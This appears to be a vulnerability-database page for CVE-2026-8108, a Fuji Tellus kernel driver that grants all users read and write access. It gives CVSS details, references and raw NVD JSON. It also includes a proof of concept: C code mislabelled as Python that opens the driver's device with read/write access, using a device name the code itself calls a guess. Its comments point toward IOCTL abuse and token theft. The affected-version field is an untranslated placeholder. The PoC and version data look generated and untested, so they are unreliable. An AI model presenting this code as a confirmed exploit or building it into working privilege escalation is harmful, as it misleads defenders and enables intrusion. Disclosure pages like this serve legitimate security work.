CVE-2026-8108

Description

The installation of Fuji Tellus adds a driver to the kernel which grants all users read and write permissions.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Fuji Tellus < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <windows.h>
#include <stdio.h>

// PoC for CVE-2026-8108: Privilege Escalation via Insecure Kernel Driver
// This PoC demonstrates opening the vulnerable device with low privileges.

int main() {
    HANDLE hDevice;
    // Note: The actual device name needs to be obtained through reverse engineering the driver
    char* deviceName = "\\\\.\\FujiTellusDevice"; 
    DWORD bytesReturned;

    printf("[*] Attempting to open vulnerable device: %s\n", deviceName);

    // Attempt to open the device with Read/Write access
    hDevice = CreateFileA(
        deviceName,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device. Error: %d\n", GetLastError());
        printf("[-] This might indicate the driver is not loaded or patched.\n");
        return 1;
    }

    printf("[+] Successfully opened the device handle!\n");
    printf("[+] Vulnerability Confirmed: Low privileged user has access to kernel driver.\n");

    // In a real exploit scenario, an attacker would now send IOCTLs
    // or write to memory to escalate privileges (e.g., stealing System token).
    
    CloseHandle(hDevice);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8108
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8108
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8108/
[4] VulDB https://vuldb.com/cve/CVE-2026-8108
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-132-01.json
[6] https://www.cisa.gov/news-events/ics-advisories/icsa-26-132-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8108", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:19.023", "lastModified": "2026-05-12T23:16:19.023", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The installation of Fuji Tellus adds a driver to the kernel which grants all users read and write permissions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-749"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-132-01.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-132-01", "source": "[email protected]"}]}}